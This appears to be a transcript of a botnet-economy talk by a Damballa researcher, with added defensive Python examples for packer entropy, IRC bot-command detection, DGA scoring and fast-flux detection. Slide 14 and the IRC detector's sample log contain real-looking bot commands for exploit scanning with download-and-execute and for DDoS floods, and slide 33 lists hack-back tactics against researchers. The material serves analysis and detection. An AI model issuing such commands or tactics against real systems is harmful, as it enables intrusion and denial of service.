Your computer is worth 30 cents - Gunter Ollmann

In case you haven’t noticed, there’s a war going on. Malware vendors, SEO consultants, exploit pack developers, content delivery specialists and botnet masters are battling for control of your computer. They’re not battling you or the security systems you’ve deployed – they won that war quite some time ago. No, they’re battling each other over who gets to own your computer – and consequently who gets to make money from it.

The botnet ecosystem is evolving at a rapid pace. Specialized services have come to fill every niche of the hacking world. The front line is rarely the mechanical process of exploitation and infection – instead it lies in innovative 24x7 support and helpdesk ticketing systems – quality of service is the competitive edge. How much is your computer worth to them? The price point is dropping day by day, but 30 cents is a pretty average trade value. Why is it so low? Because your computer is only part of the ecosystem – and a commodity one at that.


  1. Your Computer Is Worth 30¢. This battle for control of your… Gunter Ollmann, Vice President of Research
  2. About
     • Gunter Ollmann: VP of Research, Damballa Inc.
     • Damballa Inc.: Atlanta-based security company focused on enterprise detection and mitigation of botnets.
     • Brief bio: two decades in the IT industry; built and run international pentest teams, R&D groups and consulting practices around the world; formerly Chief Security Strategist for IBM, Director of X-Force for ISS, Professional Services Director for NGS Software, Head of Attack Services EMEA, etc.
     • http://blog.damballa.com and http://technicalinfodotnet.blogspot.com/
     Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  3. Perspective…
  4. Targeted? Targeted in what sense?
  5. Targeted Attacks?
  6. Access to the enterprise (timeline: 2000, 2005, 2009): submit a CV; hand out USB drives; purchase from botnet masters.
  7. Different Ways of Looking at the Threat?
  8. Serial Variants
     • Original malware code: source code or a DIY malware creator kit generates the original code.
     • Metamorphism: random changes to the code's structures and procedures.
     • Noise insertion: insertion of noise instructions and whitespace commands.
     • Compilers: different compilers (and versions) are used to generate different code.
  9. Cryptors, Packers and Binders
     • Original malware: source code or a DIY malware creator kit generates the original code.
     • Cryptors: encrypt the malware so it can only be decrypted in real time on the host.
     • Packers: compress the malware to make it small, compact and random.
     • Binders: take the malware and bind it with(in) other innocuous software.
     • QA: automatically run the new malware through AV detection tests.
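Slides 8 and 9 explain why a byte-signature match on the original sample stops working once the code has been re-compiled, packed or encrypted. What survives those transformations is the statistical shape of the payload: compressed or encrypted bytes are close to uniformly distributed, while ordinary code and strings are not. The following is an added example (not from the slides and not Damballa's detection logic) that scores byte entropy over a sliding window and reports the high-entropy region that a cryptor/packer output or a bound-in payload leaves inside an otherwise innocuous file. The sample buffer is constructed inline: low-entropy host text with a seeded pseudo-random blob in the middle standing in for an encrypted payload.

```python
"""Sliding-window entropy triage for packed/encrypted payloads (constructed example)."""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte over the empirical byte distribution (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = 512, step: int = 256, threshold: float = 7.0):
    """Return (offset, entropy) for every window whose entropy is at or above threshold."""
    hits = []
    for off in range(0, max(1, len(data) - window + 1), step):
        h = shannon_entropy(data[off:off + window])
        if h >= threshold:
            hits.append((off, round(h, 2)))
    return hits


def merge_regions(hits, window: int):
    """Coalesce overlapping flagged windows into (start, end) byte ranges."""
    regions = []
    for off, _ in hits:
        if regions and off <= regions[-1][1]:
            regions[-1][1] = max(regions[-1][1], off + window)
        else:
            regions.append([off, off + window])
    return [tuple(r) for r in regions]


# Constructed sample: 4 KB of ordinary text, a 2 KB seeded pseudo-random blob
# (stand-in for a cryptor's output), then 4 KB of text again.
HOST_TEXT = (b"MZ header, import table, and ordinary strings of an innocuous host program. " * 54)[:4096]
_rng = random.Random(1234)  # fixed seed so the example is reproducible
BLOB = bytes(_rng.getrandbits(8) for _ in range(2048))
SAMPLE = HOST_TEXT + BLOB + HOST_TEXT


def scan(data: bytes = SAMPLE, window: int = 512):
    """Convenience wrapper: flagged windows and the merged suspicious regions."""
    hits = high_entropy_windows(data, window=window)
    return {"windows": hits, "regions": merge_regions(hits, window)}


if __name__ == "__main__":
    result = scan()
    print("host text entropy: %.2f, blob entropy: %.2f" % (shannon_entropy(HOST_TEXT), shannon_entropy(BLOB)))
    for start, end in result["regions"]:
        print("high-entropy region at bytes %d-%d" % (start, end))
```

The threshold of 7.0 bits/byte is a starting point, not a rule: legitimate compressed resources, certificates and media sections also score high, so the region's location (for example, overlapping the entry point or a writable section) is what turns an entropy hit into a packer verdict.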
  10. Avoiding analysis systems
  11. Virus Testing
  12. Bot spreading & Support
  13. Command & Control Evolution
     • Star topology: common clustering.
     • Hierarchical topology: easy to sell/rent branches.
     • Multi-server topology: high resilience to shut-down.
     • Random P2P, etc.
  14. Botnet Command and Control
     • IRC command and control is still common for botnet management.
     • The command language varies with the nature of the botnet (Sdbot/Reptile capabilities vs. Rbot).
     • Sample bot command sequence:
         1: scan.start ms08_067_netapi 25 3 (download+exec x.x.x.x)
         1: .udp 208.43.216.195 1995 999999999999 –s
         2: .scan 75 1 201.x.x.x 2 1 201.x.x.x
         2: .ddos.ack 208.43.216.195 1995 9999999999999 –s
         3: .root.start lsass_445 100 3 0 -r –s
     • Slide annotations: …typically used for DDoS; …scan hosts within a Class A for port 443 and attempt to exploit (Conficker).
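Because the command language on slide 14 is terse and consistent, it is also easy to spot on the wire: a PRIVMSG whose text starts with a dot-prefixed verb and a target IP is not how people chat. The following is an added example (not from the slides and not Damballa's detection logic) that parses raw IRC lines, matches the verbs shown on the slide, pulls out the target addresses and summarises commands per herder nick. The log lines are constructed for the example; the nick, channel, host and "example.test" names are placeholders.

```python
"""Flag IRC PRIVMSG traffic that carries bot-herder command syntax (constructed example)."""
import re
from collections import Counter, defaultdict

# RFC 1459 message shape: [":" prefix SPACE] command [SPACE params]
IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+)\s+)?(?P<command>[A-Za-z]+|\d{3})(?:\s+(?P<params>.*))?$")
# Verbs shown on the slide; longest alternatives first so "scan.start" wins over "scan".
BOT_CMD = re.compile(r"^\.?(?P<verb>scan\.start|root\.start|ddos\.[a-z]+|udp|scan)\b(?P<args>.*)$", re.IGNORECASE)
# IPv4 literals, allowing the "x" placeholders the slide uses for anonymised octets.
IPV4ISH = re.compile(r"\b(?:\d{1,3}|x)(?:\.(?:\d{1,3}|x)){3}\b")
FAMILY = {"udp": "ddos", "ddos": "ddos", "scan": "scan", "root": "scan"}

# Constructed sample log: one herder issuing the slide's commands, plus ordinary traffic.
SAMPLE_LOG = [
    ":master!ops@10.0.0.5 PRIVMSG #bots :.udp 208.43.216.195 1995 999999999999 -s",
    ":master!ops@10.0.0.5 PRIVMSG #bots :.scan 75 1 201.x.x.x 2 1 201.x.x.x",
    ":master!ops@10.0.0.5 PRIVMSG #bots :.ddos.ack 208.43.216.195 1995 9999999999999 -s",
    ":master!ops@10.0.0.5 PRIVMSG #bots :.root.start lsass_445 100 3 0 -r -s",
    ":master!ops@10.0.0.5 PRIVMSG #bots :scan.start ms08_067_netapi 25 3",
    ":alice!a@example.test PRIVMSG #chat :anyone seen the new patch notes?",
    "PING :irc.example.test",
]


def parse_irc_line(line: str):
    """Split a raw IRC line into nick, command, target and message text."""
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    prefix = m.group("prefix") or ""
    params = m.group("params") or ""
    msg = {"nick": prefix.split("!", 1)[0] or None, "command": m.group("command").upper(),
           "target": None, "text": None}
    if msg["command"] == "PRIVMSG":
        target, _, text = params.partition(" :")  # "<target> :<text>"
        msg["target"], msg["text"] = target, text
    return msg


def classify_bot_command(text: str):
    """Return verb, family and target IPs if the text looks like a bot command, else None."""
    m = BOT_CMD.match(text.strip())
    if not m:
        return None
    verb = m.group("verb").lower()
    return {"verb": verb, "family": FAMILY[verb.split(".")[0]], "targets": IPV4ISH.findall(m.group("args"))}


def detect(lines):
    """Alerts for every PRIVMSG whose text matches the bot command grammar."""
    alerts = []
    for line in lines:
        msg = parse_irc_line(line)
        if not msg or msg["command"] != "PRIVMSG" or msg["text"] is None:
            continue
        hit = classify_bot_command(msg["text"])
        if hit:
            alerts.append({"nick": msg["nick"], "channel": msg["target"], "raw": msg["text"], **hit})
    return alerts


def commands_by_nick(alerts):
    """Count command families per nick: a nick issuing several is the herder, not a bot."""
    summary = defaultdict(Counter)
    for a in alerts:
        summary[a["nick"]][a["family"]] += 1
    return {nick: dict(c) for nick, c in summary.items()}


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for a in found:
        print("%s in %s: %s (%s) -> %s" % (a["nick"], a["channel"], a["verb"], a["family"], a["targets"]))
    print(commands_by_nick(found))
```

The verb list is deliberately limited to what the slide shows; in practice the signature set is per bot family, and the more durable signal is structural (a channel in which one nick only issues dot-commands and many others only answer) rather than any one verb.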
  15. IRC CnC Host Controls: Agobot, SpyBot, SDbot
  16. Zeus & Distribution. ZEUS DIY Kit:
     • RRP: $400 (street price ~$50)
     • Botnet CnC package with web management frontend.
     • Very popular – many plug-ins developed to extend functionality.
  17. Sophisticated Management
  18. Sophisticated Management
  19. Visibility…
  20. (screenshot slide with callouts 1–2; no text)
  21. Keylogger Octopus
     • Basic DIY kit
     • Evolution of free kit (incl. source code)
     • $30 for commercial version
  22. RAT Spy-Net v1.8 (screenshot)
  23. RAT Aero-Rat v0.3 (screenshot)
  24. RAT Turkojan v4 – Trojan creator
     • V.4 new features: Remote Desktop, Webcam Streaming, Audio Streaming, Remote passwords, MSN Sniffer, Remote Shell, Advanced File Manager, Online & Offline keylogger, Information about remote computer, etc.
     • Three versions: Gold, Silver & Bronze
  25. RAT PayDay v0.1 (screenshot)
  26. Hire-a-Malware-Coder (Custom Build) – quoted advert: "Platform: software running on MAC OS to Windows. Multitasking: have the capacity to work on multiple projects. Speed and responsibility: at the highest level. Pre-payment for new customers: 50% of the whole price, 30% pre-pay of the whole price for repeated customers. Rates: starting from 100 euros. I can also offer you another deal: I will share the complete source code in exchange for access to a botnet with at least 4000 infected hosts, because I don't have time to play around with my bot right now."
  27. Hire-a-malware-coder Pricing. Other models exist for hire-a-malware-coder pricing; component/functionality-based pricing:
     • Loader 300
     • FTP & Grabber 150
     • Assembler Spam bases 220
     • Socks 4/5 70
     • Botnet manager 600
     • Scripts 70
     • Password stealers (IE, MSN, etc.) 70
     • AV-remover 70
     • Screen-grabber 70
  28. Competition…
  29. Builder Battling. Zeus: world's most popular DIY malware construction kit; helps clear your system before making the malware.
  30. Battling at the Victim's Host: similar kit to Zeus.
  31. Dynamic Domain Generation – designed to thwart domain hijacking/closure. Families shown: Sinowal, Bobax/Torpig, Conficker A/B, Conficker C. Sample domains:
     fhwwhkis.com fhksvbjj.com cfzxkefy.2mydns.net kixxgxhi.com ozzlcjfwxy.mykgb.com dfhkxefj.biz
     uavpmphb.zipitover.com jstlzaccs.cc xchtucfx.com ehbcihsg.com nltngl.widescreenhd.tv kupgc.info
     mohuajixthb.afraid.org gyagluso.info bjxqjh.com.sv htiukhwb.com vemogoftiv.zipitover.com ezffoozq.biz
     dgtqwe.be xddjsvgh.com fwsdqcxozwi.mycoding.com hxqbgkyw.org cnxnp.com.py ivfjxxgf.com
     iaguaku.afraid.org nxmezijg.info btuutlevt.com.mt icdkvcjf.com pxkakigmdx.mario.org sayklyqfhk.org
     bmjlezym.com.pe zxeytdqgn.mario.org eplgu.org bynzomen.com.mx hlgkiyogcgs.ws daagsup.com.bo
     oyvtk.cn cequxn.ca cxcsicbqn.ch dcmrfv.gs
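The domains on slide 31 share a property a blocklist cannot exploit but a lexical check can: they are consonant-heavy, vowel-poor strings with no recognisable word structure. The following is an added example (not from the slides and not Damballa's detection logic) that scores the candidate labels of each queried name on three cheap indicators (vowel ratio, longest consonant run, character entropy) and flags names where at least two fire. The suffix handling (treating "com"/"co"/"net" under a two-letter ccTLD as part of the public suffix) is a simplification assumed for the example; production triage would use the public suffix list and an n-gram model trained on known DGA families.

```python
"""Heuristic DGA triage for DNS query logs (constructed example, not a production detector)."""
import math
from collections import Counter

VOWELS = set("aeiou")
# Second-level labels treated as part of the public suffix under a ccTLD (com.mx, com.py, ...).
SUFFIX_2LD = {"com", "co", "net", "org", "gov", "edu", "ac"}


def shannon_entropy(label: str) -> float:
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def max_consonant_run(label: str) -> int:
    run = best = 0
    for ch in label:
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def label_features(label: str) -> dict:
    letters = [c for c in label if c.isalpha()]
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters) if letters else 0.0
    return {"label": label, "length": len(label), "vowel_ratio": vowel_ratio,
            "max_consonant_run": max_consonant_run(label), "entropy": shannon_entropy(label)}


def indicator_count(f: dict) -> int:
    """Three independent 'does not look like a word' indicators; thresholds are assumptions."""
    hits = 0
    if f["vowel_ratio"] < 0.3:
        hits += 1
    if f["max_consonant_run"] >= 4:
        hits += 1
    if f["length"] >= 7 and f["entropy"] >= 2.8:
        hits += 1
    return hits


def candidate_labels(domain: str):
    """Labels to score: everything left of the (approximate) public suffix, minus 'www'."""
    labels = domain.lower().rstrip(".").split(".")
    suffix = 1
    if len(labels) > 2 and labels[-2] in SUFFIX_2LD and len(labels[-1]) == 2:
        suffix = 2
    return [l for l in labels[:-suffix] if l != "www"]


def dga_score(domain: str):
    """Feature dict of the worst-looking label in the name, or None if nothing to score."""
    best = None
    for label in candidate_labels(domain):
        f = label_features(label)
        f["indicators"] = indicator_count(f)
        if best is None or f["indicators"] > best["indicators"]:
            best = f
    return best


def is_suspicious(domain: str, min_indicators: int = 2) -> bool:
    f = dga_score(domain)
    return f is not None and f["indicators"] >= min_indicators


def triage(domains):
    return [d for d in domains if is_suspicious(d)]


# Mix of domains from the slide and constructed benign names.
SAMPLE_QUERIES = ["fhwwhkis.com", "ozzlcjfwxy.mykgb.com", "cfzxkefy.2mydns.net", "bjxqjh.com.sv",
                  "google.com", "damballa.com", "microsoft.com", "www.wikipedia.org"]

if __name__ == "__main__":
    for d in SAMPLE_QUERIES:
        f = dga_score(d)
        print("%-24s indicators=%d label=%s" % (d, f["indicators"], f["label"]))
```

Expect false positives on short or brand-style labels (for example a provider label such as "mycoding" can trip two indicators); the point of a lexical score is to rank names for the analyst and to gate a more expensive check such as NXDOMAIN rate per host, which is the other hallmark of a DGA client trying its daily candidate list.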
  32. Blacklisted Researchers
  33. Hack-back
     • Curiosity killed the cat: turn the botnet against CnC investigators.
     • Identifying the researcher: repeated lookup of name servers; resolution request for the CnC host name; wrong port/protocol in the CnC connection; missing handshake or keys; identify the sandbox/VM being used.
     • Response tactics: DDoS the IP address or netblock; spam flood the researcher; exploit and break out of the sandbox/VM; give different (benign) responses to the researcher.
  34. Value…
  35. How to pay; where to look; mechanisms for validation of buyer/seller.
  36. Making Money With Botnets – business motivators for bot masters:
     • Active market for purchase/sale of corporate hosts: $500-$20,000 per host.
     • Markets for the data stolen from botnet hosts: authentication credentials and PII; buying/selling stolen documents.
     • Blackhat services: noisy, high-volume, low-profit (spam, DDoS, brute-force); stealthy (click-fraud, corporate identity enumeration).
     • Reputation hijacking: running blackhat services that leverage corporate reputation.
  37. Buying Botnet Victims
  38. Worth less than you imagine. How much? 1/400th of a cent per 24 hours.
  39. Value-added Services
  40. (no text)
  41. iFrame Traffic
  42. (no text)
  43. URL Management
  44. Lookup Resilience
     • IP flux: single-flux; double-flux.
     • Domain flux: domain wildcarding; domain generation algorithms.
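Slide 44's IP flux is visible from the resolver side: a single-flux name answers with a different address, in a different netblock, on nearly every lookup and carries a short TTL; in double-flux the zone's name servers rotate the same way. The following is an added example (not from the slides and not Damballa's detection logic) that applies those two tests to a constructed set of passive-DNS style observations. The domain names, addresses (RFC 5737 and RFC 1918 ranges), thresholds and the "registrable zone = last two labels" rule are all assumptions made for the example.

```python
"""Single-/double-flux heuristics over (qname, rtype, rdata, ttl) observations (constructed example)."""
from collections import defaultdict

# Constructed observations; each tuple is one answer seen by a resolver.
OBSERVATIONS = [
    # Flux-served CnC hostname: new A record in a different /24 on almost every lookup, short TTL.
    ("cnc.flux-example.test", "A", "192.0.2.10", 60),
    ("cnc.flux-example.test", "A", "198.51.100.7", 60),
    ("cnc.flux-example.test", "A", "203.0.113.9", 60),
    ("cnc.flux-example.test", "A", "192.0.2.200", 60),
    ("cnc.flux-example.test", "A", "10.44.5.6", 60),
    # Its zone's name servers rotate across addresses as well (double-flux).
    ("flux-example.test", "NS", "ns1.flux-example.test", 120),
    ("flux-example.test", "NS", "ns2.flux-example.test", 120),
    ("ns1.flux-example.test", "A", "198.51.100.21", 120),
    ("ns1.flux-example.test", "A", "203.0.113.77", 120),
    ("ns2.flux-example.test", "A", "192.0.2.99", 120),
    ("ns2.flux-example.test", "A", "10.9.8.7", 120),
    # Single-flux shape only: rotating A records but stable name servers (a CDN looks like this too).
    ("cdn.single-example.test", "A", "192.0.2.50", 120),
    ("cdn.single-example.test", "A", "198.51.100.50", 120),
    ("cdn.single-example.test", "A", "203.0.113.50", 120),
    ("cdn.single-example.test", "A", "10.1.1.50", 120),
    ("cdn.single-example.test", "A", "10.2.2.50", 120),
    ("single-example.test", "NS", "ns.single-example.test", 86400),
    ("ns.single-example.test", "A", "192.0.2.1", 86400),
    # Ordinary hosting: one address, long TTL.
    ("www.static-example.test", "A", "192.0.2.80", 3600),
    ("static-example.test", "NS", "ns.static-example.test", 86400),
    ("ns.static-example.test", "A", "192.0.2.2", 86400),
]


def zone_of(qname: str) -> str:
    # Assumption for this example: the registrable zone is the last two labels.
    return ".".join(qname.split(".")[-2:])


def prefixes24(ips):
    return {".".join(ip.split(".")[:3]) for ip in ips}


def index(observations):
    """Group answers by name: A records, NS records and the lowest TTL seen."""
    a_records, ns_records = defaultdict(set), defaultdict(set)
    min_ttl = defaultdict(lambda: float("inf"))
    for qname, rtype, rdata, ttl in observations:
        if rtype == "A":
            a_records[qname].add(rdata)
        elif rtype == "NS":
            ns_records[qname].add(rdata)
        min_ttl[qname] = min(min_ttl[qname], ttl)
    return a_records, ns_records, min_ttl


def flux_report(observations, min_ips=5, min_prefixes=3, max_ttl=300, min_ns_ips=3):
    """Per hostname: address diversity, TTL, name-server diversity and the two flux verdicts."""
    a_records, ns_records, min_ttl = index(observations)
    ns_hosts = set().union(*ns_records.values()) if ns_records else set()
    report = {}
    for qname, ips in a_records.items():
        if qname in ns_hosts:  # name servers are scored through their zone, not on their own
            continue
        ns_ips = set().union(*(a_records.get(h, set()) for h in ns_records.get(zone_of(qname), ())))
        single = len(ips) >= min_ips and len(prefixes24(ips)) >= min_prefixes and min_ttl[qname] <= max_ttl
        double = single and len(ns_ips) >= min_ns_ips and len(prefixes24(ns_ips)) >= 2
        report[qname] = {"distinct_ips": len(ips), "distinct_prefixes": len(prefixes24(ips)),
                         "min_ttl": min_ttl[qname], "ns_ips": len(ns_ips),
                         "single_flux": single, "double_flux": double}
    return report


if __name__ == "__main__":
    for name, row in flux_report(OBSERVATIONS).items():
        print(name, row)
```

The single-flux test alone cannot separate a flux network from a CDN with a short TTL, which is why the example carries the double-flux test and why real deployments add ownership diversity (distinct ASNs, residential versus hosting space) to the address-count check.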
  45. (no text)
  46. Umm…
  47. Conclusions
  48. Thank You! Gunter Ollmann - VP of Research, gollmann@damballa.com. WWW – http://www.damballa.com; Blog - http://blog.damballa.com; Blog - http://technicalinfodotnet.blogspot.com
